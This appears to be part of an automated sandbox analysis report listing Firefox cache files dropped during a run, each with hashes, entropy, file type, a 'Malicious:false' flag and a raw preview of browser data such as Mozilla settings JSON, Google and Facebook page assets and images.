                                                                                                                                                                                  SHA-512:D262294617913D33624FAA1CF2F3EECF48AA8BB378B5B7CA1D9D0802D4815FC1F612C1D4080021D681A99DAD05FB3B0DC0767C3EAA596295DD9EBE164038BA57
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.H-. .-..?/.C.....3.,J....u.EQ...6..`....K.g{. ..4.....t...j.Z.sk. ..t..'x.|...e.C...!.6U...LQ..6.4.......P......i..]......i>.&:G%..b.......<.d..Q...A9.c...R..f>9T...B...YU...~7..:......F....z.MH..$.... .aU.V.fg..b....H_H.R..U.........P%L.S)......)...oY....!....< .....D+.L.....|Ew.f...n}...a9...).5...e}=....iU-+....|.H.o..M..N....^.$C...NU..4.k..I.7*....O.'.b.w.....-B.r.X.....i.6u.'...W.t.6.L.4".mB.9.S..h8..V.ltZo*.('a$.#.Q4....}g...vn.3&....[90..(p....<....3.Gw.>.......\.l..Q.7.+..P.".m.......ve.^.V.r.M..j..~#CK...U..}.........U.[....jl>...M..um......YW....-.@.A...a..tpa.{......v......"s..B....0.t}G0Z..{.x)...3..\.5..mb.!.E..9$^..l....].I..`...i{`..r..r..&.Y.QNl}9.2.....2Y..-..0`vHL.w7x....odcHV...r..L@..Z.).0.&....v$.+.. ..9..M.0.F2..ei6...(f..N...%.?`.z..;......4...m43.,.`......C.d......).$`..h|.k..&l3^...6.^m............l.. ...y[N....Ya.u]m.J....x.9.w..i..s..F..w.c......j.fLh.m...1B|..Z..?.0..Op\....W..;.$...4D..Xn..r...,dnT.h......

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\C886C15B36E63849FB9E86DCC97456303F590459

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):308
                                                                                                                                                                                  Entropy (8bit):4.961803357284853
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6:yI/RRnjXDkw+qsH3X8sXWzusDvLKd+uS3jcTPVGsDZpd+ZmUmVGsD9w+IkS3jcT1:yI/rb+qmX8QuuuWxqjcT0uZpuu++DSTm
                                                                                                                                                                                  MD5:727C56C96D23D3276C3178764D81CD69
                                                                                                                                                                                  SHA1:4256D7848C4513855A343C18CAF52D52F254C130
                                                                                                                                                                                  SHA-256:51A281399E83A71D442C74C7C3CBB834073B3D31AF07CD950CCC422961963445
                                                                                                                                                                                  SHA-512:E424D3099B693DB938928ADABCA47814003789A35EE5FA06B01EE140BE436CCC5948454B5EAA2CE76549D7E2BAA840B4212BE61448718C7B5893D0EEB57B5D79
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..F~........e...e...F........../....~predictor-origin,:https://accounts.google.com/.predictor::seen.1.predictor::resource-count.3.predictor::https://www.gstatic.com/.1,8,1708515102,4096.predictor::https://fonts.gstatic.com/.1,7,1708515101,4096.predictor::https://accounts.google.com/.1,2,1708515102,4096.....

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\C8A0038CBF646EF8976D3F18074D209A1EF6AA80

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8582
                                                                                                                                                                                  Entropy (8bit):6.100399502746726
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:0QOBwTeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWds8ads8A:beLYGBRohB1r1uk/KiFTaIdaK0
                                                                                                                                                                                  MD5:8B4A453CFA60775FD2CDCB29350CACAA
                                                                                                                                                                                  SHA1:4B24D05C8D38E5AEDE298C84128C534F3A62FCE6
                                                                                                                                                                                  SHA-256:A851E4AD7EA10512AFB52387EF826884A30B2D885EB693112CF88139CA410326
                                                                                                                                                                                  SHA-512:A2A959F11C8496A877DB96E4EFF469074AC3CBF3A99ABC707363E323B9B6D051ABFF13CFA727F9613F8C29A9BA364951C0A203FC14AE2DB8418F3AB32ED6464B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"permissions":{},"data":{"signature":{"ref":"2wyvapgygdnqx2e95kpjamyk8","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"IghkvGveEMvteLqgP9lraDwsqPPCcU-5gEEU5-pIVFKDdlxMZTFjIDPPFuaywi5dp6NwOn4boQe74koTT4o4grI5ip4Jcxct-x0fnc1Enq-GTR-okhCMpCICFXKvAXxz","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8sqFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBcrrUruEYcLg7gsw2EWoqGzqOXmUVf5aDVfUHQxV8aW4x3H/oT0qGFXgDFHb+t"},"id":"password-rules","last_modified":1708300806966}}.3.A..........e...e...F.A.e..K...q....:https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/password-rules?_expected=1679600032742.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAXxMIIF7TCCA9WgA

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\CACCC3A89786870F01F826BB14533828361B13D3

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 2584412160
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13906
                                                                                                                                                                                  Entropy (8bit):6.918155475082785
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:SW9wR4O9pU0DSjuUHLmzwTWvoglJmzwTWvogrBHJm2OdAnAlCvDx/CvDx1:SW9Erq07lzSWvoI8zSWvoIBHJmvOW
                                                                                                                                                                                  MD5:C551C0F11900FAFAD68A8B8BE6274841
                                                                                                                                                                                  SHA1:C1DF3F9A588DEE7C39B14A0A1D3BF348FE3230EA
                                                                                                                                                                                  SHA-256:787A90D586B8B983C52DAA8D48A2327359969E000CFBA2ED06F6F4E838F2DA18
                                                                                                                                                                                  SHA-512:85D1394D96026C2E6E4D2040E54A82B12EA8796F1A38352C68F2C5F04D2E4A7AEDD99B0A78A9500745A5F2F1D75300429D5C49D730F84DB6AAE15061EA0D9F83
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........Yms.8.....@Y....{w..z..0$..d.2.sSS.,......$....n.66..../..[..%.d!..q..X.......G..I./.Ip.<x.7g..Uj..$.......,:x..7|..V#.^W.../.=....<.....O#z.b....3....O....]Hf.CV...#z.q..H....."..SCX.7.RJ.m.....7o.t..#......4...M.....1u....nNH..8......!?..rG.\..=.<.K/L.......xc.mF....I.1.;b...Y$.x....~n.._-U"i.."r..W..(.;.#....f...m\.Q..P.i.........T{.t........9#.q.j5._........L...U..w........]j...G........../..4.z].R..EpP....)/.....n...%..N.K.FT.d.k./l{.. ...&..tOu._...?...7..C...Y.L.w+j...E.u.[Q..W.S..Vo.3bq.<.,..,...F.B..Ku%.D...|!.f.Xl.......0d... '..\....$.....E..o.G....Tb.u...'+n/C.=h.....`Bc3D..n.m..T..=..q..G...P....r.R't_..zrM..tI"._............)..;o x..!.....vP....#.5..n ..@.0.S.31K....g...w. s.z.G.e.A.3..I$6..,..wa.Ku. ..vS0.N..a...t.>Z.H.r483.e. .:..:....;c...U./...U...R...M..b...q......Q.Fw..*..V....P_..).4.....Yd...e.e..yA1..3.U....&hd5.W.+F..h#.T...Fp&....IY...._j.llI...#:e.....'....$..Jd......R.s..c...7.........Cw..~..N

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\CC230D350F313FAE2988A4DBF98AE3240CF50240

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):58859
                                                                                                                                                                                  Entropy (8bit):5.538232498305284
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:ZTwOcg07ukcVSJd60sxe2IBqYvCKF8MOH:g7ukx60ST89rF8MOH
                                                                                                                                                                                  MD5:CD676486C8510AC6526E3F97FF9B3E93
                                                                                                                                                                                  SHA1:4DC44DF4745A760B6896F5744C3ECB5CB5AB741E
                                                                                                                                                                                  SHA-256:CB50F9760485F849402A2717B1089D8AEE7DF878447F539707E732B1141A59A0
                                                                                                                                                                                  SHA-512:AFE00CA58676BF4825EE50D7B8C6CAF46B5C3A3F3F9244CC83E258E7022225CBF14E40011B2C00BFF5A82C72F4B59F90B410FDAF8415A85F1415C2772B05D407
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"sort":"domain","schema":{"type":"object","title":"Cookie Banner Rule","required":["domain"],"properties":{"click":{"type":"object","title":"Click","properties":{"hide":{"type":"string","title":"Hide Selector","description":"Query selector for element to hide while handling cookie banner. Defaults to 'presence' selector."},"optIn":{"type":"string","title":"Opt-in Selector","description":"Query selector for opt-in / accept all button"},"optOut":{"type":"string","title":"Opt-out Selector","description":"Query selector for opt-out / reject all button"},"presence":{"type":"string","title":"Presence Selector","description":"Query selector to detect cookie banner element."}},"description":"Rules for detection of the cookie banner and simulated clicks.","dependencies":{"hide":["presence"],"optIn":["presence"],"optOut":["presence"]}},"domain":{"type":"string","title":"Domain","description":"Domain of the site the rule describes."},"cookies":{"type":"object","title":"Cookies","prop

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\D059FD0322F695507887307109721C11AAD75FFF

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):113
                                                                                                                                                                                  Entropy (8bit):4.785912466814496
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:2UqOcllwXNWbdUyGLk8rLtPSKVIDIIt:2UqJlIEbdOx0KVst
                                                                                                                                                                                  MD5:F2F1528AD947D81B94718015A70A4070
                                                                                                                                                                                  SHA1:98DC00AA2C359B3E1EF62DD5DC63D365388B9A90
                                                                                                                                                                                  SHA-256:32D87A008C54F84C5154BFE3B3A0B597BA77253792749D5A60167F5FD299D23F
                                                                                                                                                                                  SHA-512:236246AA546AD3A96751429D01A004E044B8078CB3B7359742FB6A2AAC384567C3A5084E1DA277CDEA6892E28EB296E6E5AC2396FC7DF411DC381B5B9D8749E8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...x........e.......F.A........H....:https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip.....

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\D0F48A0632B6C451791F4257697E861961F06A6F

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):35420
                                                                                                                                                                                  Entropy (8bit):5.086270303730476
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:aPtFYceo3KtwnY9nR+eXHxoZ/HJkNTBdHOT5Qhh7veK8t9KZF:Aeo3KtwnY9nR+eXHcHJk/dHOTij753F
                                                                                                                                                                                  MD5:B1846D94A205AFE84DA14DED30FC1A61
                                                                                                                                                                                  SHA1:A5EFD82AD8412B4AC7435381203142DF9DF4A602
                                                                                                                                                                                  SHA-256:928B27C3C7243586603625ABC511829C330C004D87D447483C337BABA37FF715
                                                                                                                                                                                  SHA-512:4A429E99C151CF5641DC3A9F68E68C8814109673EC2AE6DC71097A6FA86681FAA6FB0E9A6C3A0532553C3DFEDE8D26B1FADEEF8C2FCAFE653D31FF241DA28907
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<!doctype html>.<html>. <head>. <meta charset="utf-8">. <meta http-equiv="Content-Security-Policy" content="default-src 'none'; object-src 'none'; script-src resource: chrome:; connect-src https:; img-src https: data: blob: chrome:; style-src 'unsafe-inline';">. <meta name="color-scheme" content="light dark">. <title data-l10n-id="newtab-page-title"></title>. <link rel="icon" type="image/png" href="chrome://branding/content/icon32.png"/>. <link rel="localization" href="branding/brand.ftl" />. <link rel="localization" href="toolkit/branding/brandings.ftl" />. <link rel="localization" href="browser/newtab/newtab.ftl" />. <link rel="stylesheet" href="chrome://browser/content/contentSearchUI.css" />. <link rel="stylesheet" href="chrome://activity-stream/content/css/activity-stream.css" />. </head>. Cached: Wed, 21 Feb 2024 11:30:40 GMT -->. <body class="activity-stream">. <div id="header-asrouter-container" role="presentation"></div>. <div id="r

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\D571BBAF93D98B1EFDFC94A791C6232B2468BBE5

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):79400
                                                                                                                                                                                  Entropy (8bit):5.397078964112072
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:WwNUVzjw3BMZSJehg8EsLDkMnCszSYRK6vcm9e8GvIDuuKOa8S:3UVzjw3BMZSt8VcMn7VTvLavCKF8S
                                                                                                                                                                                  MD5:962420CA5B6131FC6D43CF44335299FC
                                                                                                                                                                                  SHA1:3862E684BFBECFD33BDEF7E899D91CDF2D655774
                                                                                                                                                                                  SHA-256:F47351EA1EF3003B81396CA47E5F26FC20A2508700BA1A6F8E55135D52E82BD2
                                                                                                                                                                                  SHA-512:D4B8EE0AD2C214CAD2859746B4CE802234F2AF97C57077C24B8C2580C369FE13338826A89AEFD05647EFC2BB692142B8721992362009CBB39A6E7DD1BA8FDC28
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"sort":"-last_modified","schema":{"type":"object","required":["name","version","fromLang","toLang","fileType"],"properties":{"id":{"type":"string"},"name":{"type":"string","title":"Name","description":"The name of the language model"},"toLang":{"type":"string","title":"To Language","description":"The BCP 47 language tag that will be translated to"},"version":{"type":"number","title":"Version","description":"The version of the model"},"fileType":{"enum":["model","lex","vocab","qualityModel","srcvocab","trgvocab"]},"fromLang":{"type":"string","title":"From Language","description":"The BCP 47 language tag that will be translated from"}}},"signature":{"ref":"6l2fz9kn1itzn2jt8iu1ix6x","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-04-09-14-36-39.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"jjbe2SbJ3p5ZHnh0ZiYZBMuywBKzBDoUpRG3DWgM_wUltcC5nJIm_z2a_geEu-LDTQsgtb_F3Mr1VHZ0t0s_l9UnHlPZMOkLXXHapPnoAG

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\D653C5CAC37C8131A9269F806C2BD86C0FFD85FF

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16707
                                                                                                                                                                                  Entropy (8bit):6.278045458727721
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:eX/7VqN4mApqN3Xo70tNo+pwPm082nyFz/aWXW6:eXUApQHkKo+pwPo2am6
                                                                                                                                                                                  MD5:14DE29C0D0B4BAC29892632179753D19
                                                                                                                                                                                  SHA1:680208D6F712CBC7250BB31D2A7D582B68DFB038
                                                                                                                                                                                  SHA-256:3E6B90A95482C5EB3994EF1718AF8E8BCDB91CE3A78EDC50985ACCC9A18F30DF
                                                                                                                                                                                  SHA-512:1CC234AA04EDDA0EB5DDA0303C457901F279C39D42DF824A3FC968696F7AA45DF530512794430822035BFD27D0C4EA92876E8A1E97B2D2B40FFDB2FABEE46B75
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:... .6.V.@>..TZv.8I.....~..$b..IR_y..z.BY?...tr.Q.Ogr..1........l....X.SS.-..61.!...6<...a3...w..[o.]..$$.n.u..ba...G...y}.[.Y.*'..N.v..Z;.i..8.<.FV.x.|.................1.i0.n0.B.<.U..:5U...kbp.{N2...p.]......./.....bLs....cd...7.R.......}.....<1.....[].T..Q...4....ub..._.$...W..D&.............d...+!C8~..$@.x....E.)........e....%r..Oz..#I....,..|Xsc.z'=.|....b..i..5.(..m.8k.t...b.R{.mM.5$=Xx.C...P.k..A.:2..](H...xh......w&..x..c.....5..{gL_QV.._.[.3X.~..E....F...'.F".1.Q......<...6.. ..|[...=..UtO...u..~_....,..Y...1/BI.s..A.....)toF..x..@u.YP.l..."a.|$..RlU..xhG..(.W.r5F...P...B..IXb....e...t...*V.PI.z+.......'..."c#.......Ct.sO.~.@.Qf...e......=....Dj....9.Y.0....*..z...l..$9...9...A....aAw...L...~.0....\.I...T.Vk....8..y]..u...H......%..vZ/n.?..<...<.UP.J......:qP.,..X]......k........G..Rh...W!.B.4....9....M!..i2R.y.-..l...LfEa#........E..V.RQI..x ._1B1..<.~.pr&.$...c*.4r.R.*..i.Mi.1n\..vP.%.......8e.Y..!..r.q.3.y...dk....a./.X.~.X..O#o.......

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\D6C6A27ADD947620F19E51D0A85D5D259E4AEBE7

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 2550857728
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13904
                                                                                                                                                                                  Entropy (8bit):6.922946455653749
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:ve8Lst01cSjuUPLmzwTWvoglJmzwTWvogrBHJm2OdAnAyCvDxTCvDxb:3stYYFzSWvoI8zSWvoIBHJmvOR
                                                                                                                                                                                  MD5:65062093D38BE29E2F16CE765B9EEB6B
                                                                                                                                                                                  SHA1:181955F9EB77042A0610E8BE0B432EECC18CD56D
                                                                                                                                                                                  SHA-256:2AEB0850EF2D8B01BA680EF1C8A08C758BE8536822CF7623755927375F81890E
                                                                                                                                                                                  SHA-512:7B30934E6CFF6FACDEDF24ED1595E6FF117B2B5D9AB70643262B9EDF91A98DDEE46213F51A73054EF46C1374C8D889493134A1F7DA869583476C61D3B6A1A0F5
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........Y{..8...bL]..-..g..va.k..<..Jf&.J...6....y.._...l...].1 u...SwK...[$....J.....c.,..r..A...'.Yp...]....{i..?..1Y>.x.....QrZ.$~^......c..k........8..'cLOf...._.).D)...K..p....jL/...4......L..dj....ZJ...?..>...E.X82...k...,..c...S..].3...,.I..{...}...`K.\..=h...?L.....&..=.mF.....K.1...;...E.\........WKUH.6..\{./....HfD[k.`...........C..A.u....I.;.s.. ....N.....}..................X.f...p..h.0..8.\..A..VU/u:..{.......^u9..N.][Z...T.$jD-L....a.^....7. .L......gX......y.L..kj...E.u._S..j..[..Dg..Ky,X"^.`"t...1.\.+) .....Bow...X.....Cn1/.r...e..u.Cb....JQ........j<..Jl.o`..d...w...m..239..Z....&>A.1=.........{.b...>."..J..}&.2tM..t.\..\.5.)....@....X....<.....c.{..j..Q..^?..{cz;....'bV>.O.O`o.].".\...1.G.A.s..i,..,....:.Y......A=.E.../..G..iT..g>.r..B...:..c.......b.]..W.R)W..:`.1..H~|..?*Fi..J.e.%.T.s.....RXeF..O.....UT....oQI1..\wU04.....Y...W5.=0.(.&u.V....|...W...~.Z.k[R4$...N..0...I..k,MB..Y.6'.......G.P3....[x..A......|4....

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\DC990C2E9B8378070C100B26A893DB305F84C5FA

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:PNG image data, 150 x 54, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11018
                                                                                                                                                                                  Entropy (8bit):7.102383988586553
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:c2/XQnPGroGD9vvnXVaKrJ4XbfAzUUV+S0t7MVkyfXfbaI8j3qm1r7o1r7C:p/XQneroUYKrkb4XV+S0mVkEXTaId8
                                                                                                                                                                                  MD5:41A77BB25D6781AD195A5C20F1085C41
                                                                                                                                                                                  SHA1:CDD595866173A7786A5EC0356BD01AFF78D7856A
                                                                                                                                                                                  SHA-256:9968472D0B84377D1991F9E89F8589181490CD5ED8BA470B9E5AA95FD14E6945
                                                                                                                                                                                  SHA-512:19ECC60CBE05BCD4FAB456B695B16848FAFB1B353C04CA48BFA7879A343055DBA5E1CD9ABF4C794A659CEED41898EA334BD9CC1E1A63BF901C36272512FC0A60
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.PNG........IHDR.......6.....%.`....)IDATx..].pT..>.l......b..(Hv7 D7.n.8....V..H_.R;S.hY`w.(..*.N_R."0`.-.A..|.*N..`....n..{.&..l.o..;.....a....d..$.................J.1.*.....7+.c...o..T/.~V.r.....D..G.Ic.....E_.FUR.&..U%...X.4!!Q.H";......e(Ic...$..."1..jR[.L..../Ek.}AH...W.L.V....Y..S..q...!._r.D....G,%...Hu.$q..\.j.x...G.....]....B.i.I.+B.....Hu.....Q...K;...J.q..._......_.x....A:......j....:c...^.....k=GIj..Y]B.V..m...Y.\....$..!....+.R%..U/;p.....R4.g.R...XH.3%..JHHby.eqOZdnS..$.. ....dn...$.w....E.o.8...b@.z.)5.L4|.F...9......pP.8.|....-.M..:..ux...7.]...'..(q..~.....KQ.W..,b..L<.Y.].V+....t4.$.V.O.....D.5..v.j...Hd.M....z.......V..q.p.......;:.J.%2.G.;./.E...!.H. ..../Dk.8.T....+..%Vs4..DC.R.`..Z..........0.[)N!.....%.>&.b.$.M....P.!...!....'Kv..Nd...mvR.:.L....w..y%.i..H..u....s.Se1.[.)."..)%.I.....(.#M..4.@....#.....X..P<...k..g....O..I..>-...'._.Q..T.y.=Z.GR{]..&t}*......>J..!,..X6.HC..$.:.}..z...._b.b.4.E.....;.Ha.?s.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\DE910EFA02EF17087C43B39996F358B94DB7332F

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (4919)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):782603
                                                                                                                                                                                  Entropy (8bit):5.590013085727958
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:Jme85Yf5fEt77xSzVJXd44E8W6t7pI7hLPGMZQ+jVkta9HAMBelqm5D6J8r:iZSzV4e7WjVktnwpqr
                                                                                                                                                                                  MD5:31D8F88DA7FB7FFF8B870CB8D303C0CE
                                                                                                                                                                                  SHA1:D42D586954C7E4BE90BC79AE361F0F200B26B1F6
                                                                                                                                                                                  SHA-256:8717EB25DD5BAD978F431EE3A0F89E37A4D0B4ED10BCD86FDB8FE2A23EBB167D
                                                                                                                                                                                  SHA-512:C75B9294F7F2F6D35AD830EE31FEFD63C3B75324479AB83FCFBE01844A717CF979193F9B0BA80111B0C7505A77CC2C7246D2AB5E74E68672E5E86F8F64B1A2CC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometLogInHiddenInputs_data.graphql",[],(function(a,b,c,d,e,f){"use strict";a=function(){var a=[{alias:null,args:null,kind:"ScalarField",name:"name",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"value",storageKey:null}];return{argumentDefinitions:[],kind:"Fragment",metadata:null,name:"CometLogInHiddenInputs_data",selections:[{alias:null,args:null,kind:"ScalarField",name:"prefill_contactpoint",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"prefill_source",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"idd_user_crypted_uid",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"locale",storageKey:null},{alias:null,args:null,concreteType:"LoginNameValue",kind:"LinkedField",name:"lsd",plural:!1,selections:a,storageKey:null},{alias:null,args:null,concreteType:"LoginNameValue",kind:"LinkedField",name:"jazoest",plural:!1,selections:a,storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"login_source

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\E0D92F4D11B6C84FC54C2C200BEFBABB5843F992

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):14644
                                                                                                                                                                                  Entropy (8bit):5.90724431559405
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:y7VqN4mApqN3Xo70tNo+pwPm082nyFz/Q:vApQHkKo+pwPo2D
                                                                                                                                                                                  MD5:0432594F7DDC4CD2003C6358F819F2BE
                                                                                                                                                                                  SHA1:150E682C3338A1CA2102A31EB9B895632409A8BC
                                                                                                                                                                                  SHA-256:E7C7F66B0506832F90B079108CEBB6C959D167F7732B83273C2865CE6815EC1B
                                                                                                                                                                                  SHA-512:302A9538DB34A4EEF02BA3C473D09FB80887FD5DD07302C135C0A0C6476B4964E011D71BA7087714A616F119E6ED9D2B281FC8821B60F5151887995937350D41
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:^.C ........e...e...F.A.e......X....O^partitionKey=%28https%2Cgoogle.com%29,:https://accounts.google.com/generate_204?T9-P6A.necko:classified.1.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAA5iMIIOXjCCDUagAwIBAgIRAJKc339ZwIrpCZuMyXFusEowDQYJKoZIhvcNAQELBQAwRjELMAkGA1UEBhMCVVMxIjAgBgNVBAoTGUdvb2dsZSBUcnVzdCBTZXJ2aWNlcyBMTEMxEzARBgNVBAMTCkdUUyBDQSAxQzMwHhcNMjQwMTI5MDgwNDQ3WhcNMjQwNDIyMDgwNDQ2WjAXMRUwEwYDVQQDDAwqLmdvb2dsZS5jb20wWTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAASB6wVGdBTGrYTNLOgcSDG0+J3gPo8rFeHbl1W+ZIBjbbIlAbGtcHWlO5LiWvX/9Ra4EykTj2Z2HH1qM2RuWespo4IMPzCCDDswDgYDVR0PAQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFJDWIvFi4WYw5Ts43/kaYiM+0kSvMB8GA1UdIwQYMBaAFIp0f6+Fze6VzT2c0OJGFPNxNR0nMGoGCCsGAQUFBwEBBF4wXDAnBggrBgEFBQcwAYYbaHR0cDovL29jc3AucGtpLmdvb2cvZ3RzMWMzMDEGCCsGAQUFBzAChiVodHRwOi8vcGtpLmdvb2cvcmVwby9jZXJ0cy9ndHMxYzMuZGVyMIIJ7wYDVR0R

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\E2E2DB2F02258A8F9FEF833AA106B9511B475D18

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8716
                                                                                                                                                                                  Entropy (8bit):6.107944858928577
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:vBgeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWd25Ld25L:ieLYGBRohB1r1uk/KiFTaIdaem
                                                                                                                                                                                  MD5:67BA54E102BECDF745A40A56C8BF1BEB
                                                                                                                                                                                  SHA1:33A73F39422F953ADBF764F0BC0D4E586BF631F3
                                                                                                                                                                                  SHA-256:03437F557C0A021B6DDF6BD5AF8E58C573B0503BDF7F064B4E9A55BAEE8F8C7E
